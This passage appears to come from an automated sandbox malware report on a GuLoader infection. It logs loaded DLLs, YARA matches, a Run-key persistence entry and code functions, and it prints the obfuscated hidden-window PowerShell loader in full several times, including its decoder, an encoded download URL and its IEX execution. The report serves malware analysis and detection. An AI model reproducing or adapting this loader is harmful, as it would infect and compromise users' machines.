                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: System.Core.pdb4 source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Targetore.pdb;"b source: powershell.exe, 00000005.00000002.2378968135.00000000085A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**Q source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.oeaccount* source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbh source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000005.00000002.2381021661.0000000009E8F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($mekanikkernes)$gloBaL:mORtALWISE133 = [syStem.TexT.ENCoDInG]::AScii.GeTstRINg($ArcHAEOL)$gloBal:COMpUtErdrEVEt=$mORTAlWIse133.substRInG($budGettetS,$mIniFiCAtioN)<#Omstningsafgifter
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ledelinjer $Muzzy $Unpretermitted), (Dekreterendes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Dnyr = [AppDomain]::CurrentDomain.GetAssemblies()$global
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Efterdateringer)), $Dobbersrtilleriets).DefineDynamicModule($Lonia, $false).DefineType($Kritikpunktet177, $Varekataloger49, [System.Mu
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($mekanikkernes)$gloBaL:mORtALWISE133 = [syStem.TexT.ENCoDInG]::AScii.GeTstRINg($ArcHAEOL)$gloBal:COMpUtErdrEVEt=$mORTAlWIse133.substRInG($budGettetS,$mIniFiCAtioN)<#Omstningsafgifter
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeo
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.tak
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeoJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_079397B5 push ebx; ret 5_2_079397B6
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228F1219 push esp; iretd 8_2_228F121A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2806 push ecx; ret 8_2_228E2819
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044693D push ecx; ret 14_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00451D54 push eax; ret 14_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AversiJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AversiJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
